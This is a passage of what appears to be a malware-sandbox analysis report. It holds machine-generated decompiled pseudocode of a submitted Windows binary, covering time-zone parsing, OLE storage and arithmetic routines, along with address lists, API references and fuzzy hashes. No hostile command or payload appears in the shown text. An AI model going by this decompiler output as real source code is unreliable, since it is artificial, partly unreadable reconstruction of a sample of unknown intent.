									return memcpy(_t141, _t105, _t133 << 2);
								}
								E0041AB3B(_t150, _t169);
								_t109 =  *0x4578a8; // 0x7080
								asm("cdq");
								_v16 = _v16 + _t109;
								asm("adc [ebp-0x8], edx");
								_t105 = E004144DC(_t131, _t138,  &_v16);
								if(_t105 == _t123) {
									goto L30;
								}
								_t136 =  *((intOrPtr*)(_t141 + 0x20));
								_t171 =  *((intOrPtr*)(_t141 + 0x20)) - _t123;
								if(_t171 > 0 || _t171 < 0 &&  *((intOrPtr*)(_t105 + 0x20)) > _t123) {
									_t111 =  *0x4578b0; // 0xfffff1f0
									asm("cdq");
									_v16 = _v16 + _t111;
									asm("adc [ebp-0x8], edx");
									_t105 = E004144DC(_t136, _t138,  &_v16);
									goto L28;
								} else {
									goto L29;
								}
							}
						}
					}
				}
			}







































                                                                              0x0041427f
                                                                              0x00414288
                                                                              0x0041428a
                                                                              0x0041428d
                                                                              0x0041428e
                                                                              0x00414290
                                                                              0x00414293
                                                                              0x00414296
                                                                              0x004144c5
                                                                              0x004144c5
                                                                              0x004144c5
                                                                              0x00000000
                                                                              0x004142a7
                                                                              0x004142a7
                                                                              0x004142ab
                                                                              0x00000000
                                                                              0x004142c1
                                                                              0x004142c1
                                                                              0x004142c6
                                                                              0x004142cd
                                                                              0x004142d0
                                                                              0x004142d1
                                                                              0x004142d3
                                                                              0x004142d5
                                                                              0x004142d6
                                                                              0x004142d9
                                                                              0x004142dc
                                                                              0x004142e1
                                                                              0x004142e6
                                                                              0x004142ea
                                                                              0x004142ed
                                                                              0x004142ed
                                                                              0x004142f1
                                                                              0x004142f5
                                                                              0x00000000
                                                                              0x00414307
                                                                              0x00414307
                                                                              0x0041430b
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x0041430b
                                                                              0x0041431c
                                                                              0x0041431c
                                                                              0x0041431c
                                                                              0x0041432d
                                                                              0x00414331
                                                                              0x00414334
                                                                              0x00414343
                                                                              0x00414366
                                                                              0x00414372
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00414374
                                                                              0x00414374
                                                                              0x00414377
                                                                              0x00414379
                                                                              0x0041437d
                                                                              0x0041437d
                                                                              0x00414381
                                                                              0x00414387
                                                                              0x0041438c
                                                                              0x0041438d
                                                                              0x00414390
                                                                              0x00414392
                                                                              0x0041439f
                                                                              0x004143a3
                                                                              0x004143a6
                                                                              0x004143b4
                                                                              0x004143bc
                                                                              0x004143bf
                                                                              0x004143c2
                                                                              0x004143d3
                                                                              0x004143d9
                                                                              0x004143f0
                                                                              0x004143f5
                                                                              0x004143ff
                                                                              0x00414406
                                                                              0x0041440f
                                                                              0x00414412
                                                                              0x00414414
                                                                              0x0041441d
                                                                              0x00414429
                                                                              0x0041442f
                                                                              0x00414433
                                                                              0x0041443f
                                                                              0x00414442
                                                                              0x00414449
                                                                              0x0041444e
                                                                              0x00414452
                                                                              0x00414454
                                                                              0x00414457
                                                                              0x00414459
                                                                              0x0041445c
                                                                              0x0041445f
                                                                              0x00414462
                                                                              0x004144ac
                                                                              0x004144b1
                                                                              0x004144b4
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x004144b6
                                                                              0x004144c0
                                                                              0x00000000
                                                                              0x004144c1
                                                                              0x00414464
                                                                              0x00414469
                                                                              0x0041446e
                                                                              0x0041446f
                                                                              0x00414476
                                                                              0x00414479
                                                                              0x00414481
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00414483
                                                                              0x00414486
                                                                              0x00414488
                                                                              0x00414491
                                                                              0x00414496
                                                                              0x00414497
                                                                              0x0041449e
                                                                              0x004144a1
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00414488
                                                                              0x00414343
                                                                              0x004142c6
                                                                              0x004142ab

                                                                              APIs
                                                                              • __allrem.LIBCMT ref: 00414337
                                                                              • __allrem.LIBCMT ref: 0041434F
                                                                              • __allrem.LIBCMT ref: 0041436B
                                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004143A6
                                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004143C2
                                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004143D9
                                                                                • Part of subcall function 0041AB3B: __lock.LIBCMT ref: 0041AB53
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.232065962.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000002.00000002.232033886.0000000000400000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232256010.0000000000432000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232336850.0000000000456000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232366609.000000000045A000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232381898.000000000045C000.00000002.00020000.sdmp Download File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_400000_lK8vF3n2e7.jbxd
                                                                              Similarity
                                                                              • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@$__lock
                                                                              • String ID: E
                                                                              • API String ID: 4106114094-3568589458
                                                                              • Opcode ID: 3e5a8c37e3a01ac0921c22e71d761fc93ae41a966764b7a81e2550e35b9d6eb4
                                                                              • Instruction ID: 0d6a5ee1a09a8c0d335fd846868d9a6baf0d39ba3f1586b60b04b9c97943b8a7
                                                                              • Opcode Fuzzy Hash: 3e5a8c37e3a01ac0921c22e71d761fc93ae41a966764b7a81e2550e35b9d6eb4
                                                                              • Instruction Fuzzy Hash: 2D7182B1E00218BFDF14DFA9CC81BDEB7B5EB84714F14826AF514E7281D7789A908B54
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 0040CC4D, Relevance: 12.3, APIs: 8, Instructions: 303memoryCOMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 71%
                                                                              			E0040CC4D(intOrPtr __ecx) {
				void* _t115;
				intOrPtr _t119;
				intOrPtr* _t120;
				void* _t121;
				intOrPtr* _t122;
				intOrPtr* _t124;
				intOrPtr* _t126;
				void _t128;
				intOrPtr* _t130;
				long _t133;
				void* _t134;
				void* _t135;
				void* _t136;
				void _t138;
				void _t140;
				void* _t142;
				void* _t143;
				void* _t146;
				void* _t147;
				void _t148;
				void* _t150;
				intOrPtr* _t152;
				void* _t153;
				void _t157;
				void* _t158;
				void _t160;
				intOrPtr* _t162;
				void* _t167;
				intOrPtr* _t169;
				intOrPtr* _t171;
				intOrPtr* _t173;
				void* _t174;
				intOrPtr* _t176;
				intOrPtr _t187;
				intOrPtr* _t207;
				void* _t211;
				void* _t226;
				void* _t227;
				void* _t228;

				E004128A0(E0043113D, _t228);
				_t176 = __ecx + 0x4c;
				 *((intOrPtr*)(_t228 - 0x20)) = __ecx;
				_t115 = E0040B655(__ecx,  *((intOrPtr*)(_t228 + 8)), 0, 3, 0x44de1c, _t176,  *(_t228 + 0x14));
				 *(_t228 + 0x14) = _t115;
				if(_t115 < 0) {
					L51:
					 *[fs:0x0] =  *((intOrPtr*)(_t228 - 0xc));
					return _t115;
				}
				 *(_t228 - 0x10) = 0;
				 *(_t228 - 0x14) = 0;
				 *((intOrPtr*)(_t228 + 8)) = 0;
				E0040B85B(__ecx, __ecx + 0x3c);
				_t119 =  *((intOrPtr*)( *((intOrPtr*)(__ecx)) + 0xc0))();
				 *((intOrPtr*)(_t228 - 0x24)) = _t119;
				if(_t119 != 0) {
					L4:
					_t226 =  *(_t228 + 0xc);
					if(_t226 == 0) {
						__eflags =  *(_t228 + 0x10);
						if( *(_t228 + 0x10) != 0) {
							L15:
							_t120 =  *_t176;
							_t211 = _t228 - 0x14;
							_t121 =  *((intOrPtr*)( *_t120))(_t120, 0x44de8c, _t211);
							__eflags = _t121;
							if(_t121 < 0) {
								L42:
								if( *(_t228 + 0x14) >= 0) {
									L45:
									_t122 =  *((intOrPtr*)(_t228 + 8));
									if(_t122 != 0) {
										 *((intOrPtr*)( *_t122 + 8))(_t122);
									}
									if( *((intOrPtr*)(_t228 - 0x24)) != 0 &&  *(_t228 + 0x14) >= 0) {
										 *(_t228 + 0x14) = 1;
									}
									_t115 =  *(_t228 + 0x14);
									goto L51;
								}
								L43:
								_t124 =  *_t176;
								if(_t124 != 0) {
									 *((intOrPtr*)( *_t124 + 0x18))(_t124, 1);
									_t126 =  *_t176;
									 *((intOrPtr*)( *_t126 + 8))(_t126);
									 *_t176 = 0;
								}
								goto L45;
							}
							__eflags = _t226;
							if(_t226 != 0) {
								__eflags =  *(_t228 + 0x10);
								if( *(_t228 + 0x10) == 0) {
									 *(_t228 + 0x14) = 0x8000ffff;
									L36:
									_t128 =  *(_t228 - 0x14);
									L37:
									 *((intOrPtr*)( *_t128 + 8))(_t128);
									L38:
									if( *(_t228 + 0x14) < 0) {
										goto L43;
									}
									if( *((intOrPtr*)(_t228 - 0x24)) == 0) {
										_t187 =  *((intOrPtr*)(_t228 - 0x20));
										if(( *(_t187 + 0x6e) & 0x00000002) == 0) {
											_t130 =  *_t176;
											 *(_t228 + 0x14) =  *((intOrPtr*)( *_t130 + 0xc))(_t130, _t187 + 0xc4);
										}
									}
									goto L42;
								}
								_t133 =  *((intOrPtr*)( *_t226 + 0x30))();
								__eflags = _t211;
								 *(_t228 - 0x2c) = _t133;
								if(__eflags > 0) {
									L29:
									 *(_t228 + 0x14) = 0x8007000e;
									 *(_t228 + 0x10) = 0;
									L30:
									__eflags =  *(_t228 + 0x10);
									 *(_t228 - 0x1c) = 0;
									if( *(_t228 + 0x10) == 0) {
										goto L36;
									}
									_t134 = _t228 - 0x1c;
									__imp__CreateILockBytesOnHGlobal( *(_t228 + 0x10), 1, _t134);
									__eflags = _t134;
									 *(_t228 + 0x14) = _t134;
									if(_t134 < 0) {
										goto L36;
									}
									_t135 = _t228 - 0x18;
									 *(_t228 - 0x18) = 0;
									__imp__StgOpenStorageOnILockBytes( *(_t228 - 0x1c), 0, 0x12, 0, 0, _t135);
									__eflags = _t135;
									 *(_t228 + 0x14) = _t135;
									if(_t135 >= 0) {
										_t138 =  *(_t228 - 0x14);
										 *(_t228 + 0x14) =  *((intOrPtr*)( *_t138 + 0x18))(_t138,  *(_t228 - 0x18));
										_t140 =  *(_t228 - 0x18);
										 *((intOrPtr*)( *_t140 + 8))(_t140);
									}
									_t136 =  *(_t228 - 0x1c);
									L21:
									 *((intOrPtr*)( *_t136 + 8))(_t136);
									goto L36;
								}
								if(__eflags < 0) {
									L26:
									_t142 = GlobalAlloc(0, _t133);
									__eflags = _t142;
									 *(_t228 + 0x10) = _t142;
									if(_t142 == 0) {
										goto L29;
									}
									_t143 = GlobalLock(_t142);
									__eflags = _t143;
									if(_t143 == 0) {
										goto L29;
									}
									 *((intOrPtr*)( *_t226 + 0x34))(_t143,  *(_t228 - 0x2c));
									GlobalUnlock( *(_t228 + 0x10));
									goto L30;
								}
								__eflags = _t133 - 0xffffffff;
								if(_t133 >= 0xffffffff) {
									goto L29;
								}
								goto L26;
							}
							_t146 = _t228 + 0xc;
							 *(_t228 + 0xc) = 0;
							__imp__CreateILockBytesOnHGlobal(0, 1, _t146);
							__eflags = _t146;
							 *(_t228 + 0x14) = _t146;
							if(_t146 < 0) {
								goto L36;
							}
							_t147 = _t228 + 0x10;
							 *(_t228 + 0x10) = 0;
							__imp__StgCreateDocfileOnILockBytes( *(_t228 + 0xc), 0x1012, 0, _t147);
							__eflags = _t147;
							 *(_t228 + 0x14) = _t147;
							if(_t147 >= 0) {
								_t148 =  *(_t228 - 0x14);
								 *(_t228 + 0x14) =  *((intOrPtr*)( *_t148 + 0x14))(_t148,  *(_t228 + 0x10));
								_t150 =  *(_t228 + 0x10);
								 *((intOrPtr*)( *_t150 + 8))(_t150);
							}
							_t136 =  *(_t228 + 0xc);
							goto L21;
						}
						L10:
						_t152 =  *_t176;
						_t214 = _t228 - 0x10;
						_t153 =  *((intOrPtr*)( *_t152))(_t152, 0x44df1c, _t228 - 0x10);
						__eflags = _t153;
						if(_t153 < 0) {
							goto L15;
						} else {
							__eflags = _t226;
							if(_t226 != 0) {
								E0042B152(_t228 - 0x74, _t214);
								 *(_t228 - 4) = 0;
								E004230C5(_t228 - 0x2c, _t228 - 0x74);
								_t157 =  *(_t228 - 0x10);
								_t158 =  *((intOrPtr*)( *_t157 + 0x14))(_t157, _t228 - 0x2c, _t226, 1, 0x1000, 0);
								_t46 = _t228 - 4;
								 *_t46 =  *(_t228 - 4) | 0xffffffff;
								__eflags =  *_t46;
								 *(_t228 + 0x14) = _t158;
								E0042B10D(_t228 - 0x74, _t228 - 0x2c);
							} else {
								_t160 =  *(_t228 - 0x10);
								 *(_t228 + 0x14) =  *((intOrPtr*)( *_t160 + 0x20))(_t160);
							}
							_t128 =  *(_t228 - 0x10);
							goto L37;
						}
					}
					if( *(_t228 + 0x10) != 0) {
						goto L15;
					}
					_t162 =  *_t176;
					_push(_t228 + 8);
					_push(0x44df2c);
					_push(_t162);
					if( *((intOrPtr*)( *_t162))() < 0) {
						goto L10;
					}
					_push(0);
					_push(0);
					_push(0);
					_push(3);
					if( *((intOrPtr*)( *_t226 + 0x50))() == 0) {
						goto L10;
					} else {
						 *(_t228 + 0x10) = 0;
						_t167 =  *((intOrPtr*)( *_t226 + 0x50))(0, 0xffffffff, _t228 + 0x10, _t228 + 0xc);
						_t207 =  *((intOrPtr*)(_t228 + 8));
						 *(_t228 + 0x14) =  *((intOrPtr*)( *_t207 + 0x14))(_t207,  *(_t228 + 0x10), _t167);
						_t169 =  *((intOrPtr*)(_t228 + 8));
						 *((intOrPtr*)( *_t169 + 8))(_t169);
						 *((intOrPtr*)(_t228 + 8)) = 0;
						goto L38;
					}
				}
				_t171 =  *_t176;
				_t227 = __ecx + 0x6c;
				 *((intOrPtr*)( *_t171 + 0x58))(_t171, 1, _t227);
				if(( *(_t227 + 2) & 0x00000002) == 0) {
					goto L4;
				}
				_t173 =  *_t176;
				_t174 =  *((intOrPtr*)( *_t173 + 0xc))(_t173,  *((intOrPtr*)(_t228 - 0x20)) + 0xc4);
				 *(_t228 + 0x14) = _t174;
				if(_t174 < 0) {
					goto L43;
				}
				goto L4;
			}










































                                                                              0x0040cc52
                                                                              0x0040cc62
                                                                              0x0040cc73
                                                                              0x0040cc76
                                                                              0x0040cc7d
                                                                              0x0040cc80
                                                                              0x0040cf54
                                                                              0x0040cf5a
                                                                              0x0040cf62
                                                                              0x0040cf62
                                                                              0x0040cc8c
                                                                              0x0040cc8f
                                                                              0x0040cc92
                                                                              0x0040cc95
                                                                              0x0040cc9e
                                                                              0x0040cca6
                                                                              0x0040cca9
                                                                              0x0040ccdc
                                                                              0x0040ccdc
                                                                              0x0040cce1
                                                                              0x0040cd46
                                                                              0x0040cd49
                                                                              0x0040cdb5
                                                                              0x0040cdb5
                                                                              0x0040cdb9
                                                                              0x0040cdc3
                                                                              0x0040cdc5
                                                                              0x0040cdc7
                                                                              0x0040cf16
                                                                              0x0040cf19
                                                                              0x0040cf33
                                                                              0x0040cf33
                                                                              0x0040cf38
                                                                              0x0040cf3d
                                                                              0x0040cf3d
                                                                              0x0040cf43
                                                                              0x0040cf4a
                                                                              0x0040cf4a
                                                                              0x0040cf51
                                                                              0x00000000
                                                                              0x0040cf51
                                                                              0x0040cf1b
                                                                              0x0040cf1b
                                                                              0x0040cf1f
                                                                              0x0040cf26
                                                                              0x0040cf29
                                                                              0x0040cf2e
                                                                              0x0040cf31
                                                                              0x0040cf31
                                                                              0x00000000
                                                                              0x0040cf1f
                                                                              0x0040cdcd
                                                                              0x0040cdcf
                                                                              0x0040ce2f
                                                                              0x0040ce32
                                                                              0x0040cee1
                                                                              0x0040cee8
                                                                              0x0040cee8
                                                                              0x0040ceeb
                                                                              0x0040ceee
                                                                              0x0040cef1
                                                                              0x0040cef4
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x0040cef9
                                                                              0x0040cefb
                                                                              0x0040cf02
                                                                              0x0040cf04
                                                                              0x0040cf13
                                                                              0x0040cf13
                                                                              0x0040cf02
                                                                              0x00000000
                                                                              0x0040cef9
                                                                              0x0040ce3c
                                                                              0x0040ce3f
                                                                              0x0040ce41
                                                                              0x0040ce44
                                                                              0x0040ce7d
                                                                              0x0040ce7d
                                                                              0x0040ce84
                                                                              0x0040ce87
                                                                              0x0040ce87
                                                                              0x0040ce8a
                                                                              0x0040ce8d
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x0040ce8f
                                                                              0x0040ce98
                                                                              0x0040ce9e
                                                                              0x0040cea0
                                                                              0x0040cea3
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x0040cea5
                                                                              0x0040ceb1
                                                                              0x0040ceb4
                                                                              0x0040ceba
                                                                              0x0040cebc
                                                                              0x0040cebf
                                                                              0x0040cec1
                                                                              0x0040cecd
                                                                              0x0040ced0
                                                                              0x0040ced6
                                                                              0x0040ced6
                                                                              0x0040ced9
                                                                              0x0040ce24
                                                                              0x0040ce27
                                                                              0x00000000
                                                                              0x0040ce27
                                                                              0x0040ce46
                                                                              0x0040ce4d
                                                                              0x0040ce4f
                                                                              0x0040ce55
                                                                              0x0040ce57
                                                                              0x0040ce5a
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x0040ce5d
                                                                              0x0040ce63
                                                                              0x0040ce65
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x0040ce6f
                                                                              0x0040ce75
                                                                              0x00000000
                                                                              0x0040ce75
                                                                              0x0040ce48
                                                                              0x0040ce4b
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x0040ce4b
                                                                              0x0040cdd1
                                                                              0x0040cdd8
                                                                              0x0040cddb
                                                                              0x0040cde1
                                                                              0x0040cde3
                                                                              0x0040cde6
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x0040cdec
                                                                              0x0040cdf9
                                                                              0x0040cdfc
                                                                              0x0040ce02
                                                                              0x0040ce04
                                                                              0x0040ce07
                                                                              0x0040ce09
                                                                              0x0040ce15
                                                                              0x0040ce18
                                                                              0x0040ce1e
                                                                              0x0040ce1e
                                                                              0x0040ce21
                                                                              0x00000000
                                                                              0x0040ce21
                                                                              0x0040cd4b
                                                                              0x0040cd4b
                                                                              0x0040cd4f
                                                                              0x0040cd59
                                                                              0x0040cd5b
                                                                              0x0040cd5d
                                                                              0x00000000
                                                                              0x0040cd5f
                                                                              0x0040cd5f
                                                                              0x0040cd61
                                                                              0x0040cd7d
                                                                              0x0040cd89
                                                                              0x0040cd8c
                                                                              0x0040cd91
                                                                              0x0040cd9b
                                                                              0x0040cd9e
                                                                              0x0040cd9e
                                                                              0x0040cd9e
                                                                              0x0040cda5
                                                                              0x0040cda8
                                                                              0x0040cd63
                                                                              0x0040cd63
                                                                              0x0040cd6c
                                                                              0x0040cd6c
                                                                              0x0040cdad
                                                                              0x00000000
                                                                              0x0040cdad
                                                                              0x0040cd5d
                                                                              0x0040cce6
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x0040ccec
                                                                              0x0040ccf3
                                                                              0x0040ccf4
                                                                              0x0040ccf9
                                                                              0x0040ccfe
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x0040cd02
                                                                              0x0040cd03
                                                                              0x0040cd04
                                                                              0x0040cd05
                                                                              0x0040cd0e
                                                                              0x00000000
                                                                              0x0040cd10
                                                                              0x0040cd1f
                                                                              0x0040cd22
                                                                              0x0040cd25
                                                                              0x0040cd32
                                                                              0x0040cd35
                                                                              0x0040cd3b
                                                                              0x0040cd3e
                                                                              0x00000000
                                                                              0x0040cd3e
                                                                              0x0040cd0e
                                                                              0x0040ccab
                                                                              0x0040ccaf
                                                                              0x0040ccb6
                                                                              0x0040ccbd
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x0040ccc2
                                                                              0x0040ccce
                                                                              0x0040ccd3
                                                                              0x0040ccd6
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000

                                                                              APIs
                                                                              • __EH_prolog.LIBCMT ref: 0040CC52
                                                                                • Part of subcall function 0040B655: CoGetClassObject.OLE32(?,?,00000000,0044DE4C,?), ref: 0040B675
                                                                                • Part of subcall function 0042B152: __EH_prolog.LIBCMT ref: 0042B157
                                                                                • Part of subcall function 0042B10D: __EH_prolog.LIBCMT ref: 0042B112
                                                                              • CreateILockBytesOnHGlobal.OLE32(00000000,00000001,?), ref: 0040CDDB
                                                                              • StgCreateDocfileOnILockBytes.OLE32(?,00001012,00000000,?), ref: 0040CDFC
                                                                              • GlobalAlloc.KERNEL32(00000000,00000000), ref: 0040CE4F
                                                                              • GlobalLock.KERNEL32 ref: 0040CE5D
                                                                              • GlobalUnlock.KERNEL32(?), ref: 0040CE75
                                                                              • CreateILockBytesOnHGlobal.OLE32(?,00000001,?), ref: 0040CE98
                                                                              • StgOpenStorageOnILockBytes.OLE32(?,00000000,00000012,00000000,00000000,?), ref: 0040CEB4
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.232065962.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000002.00000002.232033886.0000000000400000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232256010.0000000000432000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232336850.0000000000456000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232366609.000000000045A000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232381898.000000000045C000.00000002.00020000.sdmp Download File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_400000_lK8vF3n2e7.jbxd
                                                                              Similarity
                                                                              • API ID: GlobalLock$Bytes$CreateH_prolog$AllocClassDocfileObjectOpenStorageUnlock
                                                                              • String ID:
                                                                              • API String ID: 645133905-0
                                                                              • Opcode ID: 0cb11e2dc964bcfe29984320b008dcfb3e5dfb18119a45be6a041223be77d770
                                                                              • Instruction ID: 70cfa65dd7f3a786f9eb9bacd01d9dc5c19ce028ea4dd66370c0f79e5c229cc7
                                                                              • Opcode Fuzzy Hash: 0cb11e2dc964bcfe29984320b008dcfb3e5dfb18119a45be6a041223be77d770
                                                                              • Instruction Fuzzy Hash: EEC12D70900209EFCF14DF55C988DAEBBB9FF89704B20466AF811EB290D775D941CBA5
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 0041A554, Relevance: 12.2, APIs: 8, Instructions: 212timeCOMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 96%
                                                                              			E0041A554(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				int _t21;
				long _t22;
				char* _t24;
				signed int _t26;
				signed int _t27;
				int _t29;
				char* _t30;
				int _t32;
				char* _t33;
				char* _t34;
				char* _t35;
				int _t36;
				int _t39;
				int _t41;
				int _t44;
				char* _t48;
				void* _t51;
				int _t52;
				void* _t56;
				void* _t58;
				int _t60;
				int _t63;
				signed int _t82;
				char* _t87;
				int _t89;
				void* _t90;

				_push(0x18);
				_push(0x44cc10);
				E00412BA4(__ebx, __edi, __esi);
				 *(_t90 - 0x20) = 0;
				E004148F8(__ebx, 0, 7);
				 *(_t90 - 4) = 0;
				_t63 =  *0x45a740; // 0x0
				 *(_t90 - 0x28) = _t63;
				 *0x45a824 = 0;
				 *0x45794c =  *0x45794c | 0xffffffff;
				 *0x457940 =  *0x457940 | 0xffffffff;
				_t87 = E0041D839("TZ");
				 *((intOrPtr*)(_t90 - 0x24)) = _t87;
				if(_t87 == 0 ||  *_t87 == 0) {
					_t21 =  *0x45a828; // 0x0
					__eflags = _t21;
					if(_t21 != 0) {
						_push(_t21);
						E00412A4D();
						 *0x45a828 = 0;
					}
					_t22 = GetTimeZoneInformation(0x45a778);
					__eflags = _t22 - 0xffffffff;
					if(_t22 == 0xffffffff) {
						goto L31;
					} else {
						 *0x45a824 = 1;
						_t26 = 0x45a778->Bias; // 0x0
						_t27 = _t26 * 0x3c;
						 *0x4578a8 = _t27;
						__eflags =  *0x45a7be; // 0x0
						if(__eflags != 0) {
							_t82 =  *0x45a7cc; // 0x0
							_t39 = _t27 + _t82 * 0x3c;
							__eflags = _t39;
							 *0x4578a8 = _t39;
						}
						__eflags =  *0x45a812; // 0x0
						if(__eflags == 0) {
							L22:
							 *0x4578ac = 0;
							 *0x4578b0 = 0;
							goto L23;
						} else {
							_t36 =  *0x45a820; // 0x0
							__eflags = _t36;
							if(_t36 == 0) {
								goto L22;
							}
							 *0x4578ac = 1;
							 *0x4578b0 = (_t36 -  *0x45a7cc) * 0x3c;
							L23:
							_t29 = WideCharToMultiByte(_t63, 0, 0x45a77c, 0xffffffff,  *0x457938, 0x3f, 0, _t90 - 0x1c);
							__eflags = _t29;
							if(_t29 == 0) {
								L26:
								_t30 =  *0x457938; // 0x4578b8
								 *_t30 = 0;
								L27:
								_t32 = WideCharToMultiByte(_t63, 0, 0x45a7d0, 0xffffffff,  *0x45793c, 0x3f, 0, _t90 - 0x1c);
								__eflags = _t32;
								if(_t32 == 0) {
									L30:
									_t33 =  *0x45793c; // 0x4578f8
									 *_t33 = 0;
									goto L31;
								}
								__eflags =  *(_t90 - 0x1c);
								if( *(_t90 - 0x1c) != 0) {
									goto L30;
								}
								_t34 =  *0x45793c; // 0x4578f8
								_t34[0x3f] = 0;
								goto L31;
							}
							__eflags =  *(_t90 - 0x1c);
							if( *(_t90 - 0x1c) != 0) {
								goto L26;
							}
							_t35 =  *0x457938; // 0x4578b8
							_t35[0x3f] = 0;
							goto L27;
						}
					}
				} else {
					_t41 =  *0x45a828; // 0x0
					if(_t41 == 0) {
						L6:
						_t44 = E00412247(E00411A30(_t87) + 1);
						 *0x45a828 = _t44;
						if(_t44 == 0) {
							L31:
							_t24 = E004127F2(_t90 - 0x10, 0xffffffff);
							L47:
							return E00412BDF(_t24);
						}
						E00419460(_t44, _t87);
						 *(_t90 - 4) =  *(_t90 - 4) | 0xffffffff;
						E0041A76F();
						E0041ADB0( *0x457938, _t87, 3);
						_t48 =  *0x457938; // 0x4578b8
						_t48[3] = 0;
						_t89 = _t87 + 3;
						if( *_t89 == 0x2d) {
							 *(_t90 - 0x20) = 1;
							_t89 = _t89 + 1;
						}
						 *0x4578a8 = E00413BE0(_t89) * 0xe10;
						while(1) {
							_t51 =  *_t89;
							if(_t51 != 0x2b && (_t51 < 0x30 || _t51 > 0x39)) {
								break;
							}
							_t89 = _t89 + 1;
						}
						__eflags =  *_t89 - 0x3a;
						if( *_t89 != 0x3a) {
							L42:
							__eflags =  *(_t90 - 0x20);
							if( *(_t90 - 0x20) != 0) {
								 *0x4578a8 =  ~( *0x4578a8);
							}
							_t52 =  *_t89;
							 *0x4578ac = _t52;
							__eflags = _t52;
							if(_t52 == 0) {
								_t24 =  *0x45793c; // 0x4578f8
								 *_t24 = 0;
							} else {
								E0041ADB0( *0x45793c, _t89, 3);
								_t24 =  *0x45793c; // 0x4578f8
								_t24[3] = 0;
							}
							goto L47;
						}
						_t89 = _t89 + 1;
						 *0x4578a8 =  *0x4578a8 + E00413BE0(_t89) * 0x3c;
						while(1) {
							_t56 =  *_t89;
							__eflags = _t56 - 0x30;
							if(_t56 < 0x30) {
								break;
							}
							__eflags = _t56 - 0x39;
							if(_t56 > 0x39) {
								break;
							}
							_t89 = _t89 + 1;
							__eflags = _t89;
						}
						__eflags =  *_t89 - 0x3a;
						if( *_t89 != 0x3a) {
							goto L42;
						}
						_t89 = _t89 + 1;
						 *0x4578a8 =  *0x4578a8 + E00413BE0(_t89);
						while(1) {
							_t58 =  *_t89;
							__eflags = _t58 - 0x30;
							if(_t58 < 0x30) {
								goto L42;
							}
							__eflags = _t58 - 0x39;
							if(_t58 > 0x39) {
								goto L42;
							}
							_t89 = _t89 + 1;
							__eflags = _t89;
						}
						goto L42;
					}
					if(E00416EE0(_t87, _t41) == 0) {
						goto L31;
					} else {
						_t60 =  *0x45a828; // 0x0
						if(_t60 != 0) {
							_push(_t60);
							E00412A4D();
						}
						goto L6;
					}
				}
			}





























                                                                              0x0041a554
                                                                              0x0041a556
                                                                              0x0041a55b
                                                                              0x0041a562
                                                                              0x0041a567
                                                                              0x0041a56d
                                                                              0x0041a570
                                                                              0x0041a576
                                                                              0x0041a579
                                                                              0x0041a57f
                                                                              0x0041a586
                                                                              0x0041a598
                                                                              0x0041a59a
                                                                              0x0041a59f
                                                                              0x0041a65d
                                                                              0x0041a662
                                                                              0x0041a664
                                                                              0x0041a666
                                                                              0x0041a667
                                                                              0x0041a66d
                                                                              0x0041a66d
                                                                              0x0041a678
                                                                              0x0041a67e
                                                                              0x0041a681
                                                                              0x00000000
                                                                              0x0041a687
                                                                              0x0041a68a
                                                                              0x0041a690
                                                                              0x0041a695
                                                                              0x0041a698
                                                                              0x0041a69d
                                                                              0x0041a6a4
                                                                              0x0041a6a6
                                                                              0x0041a6af
                                                                              0x0041a6af
                                                                              0x0041a6b1
                                                                              0x0041a6b1
                                                                              0x0041a6b6
                                                                              0x0041a6bd
                                                                              0x0041a6de
                                                                              0x0041a6de
                                                                              0x0041a6e4
                                                                              0x00000000
                                                                              0x0041a6bf
                                                                              0x0041a6bf
                                                                              0x0041a6c4
                                                                              0x0041a6c6
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x0041a6c8
                                                                              0x0041a6d7
                                                                              0x0041a6ea
                                                                              0x0041a706
                                                                              0x0041a708
                                                                              0x0041a70a
                                                                              0x0041a71c
                                                                              0x0041a71c
                                                                              0x0041a721
                                                                              0x0041a724
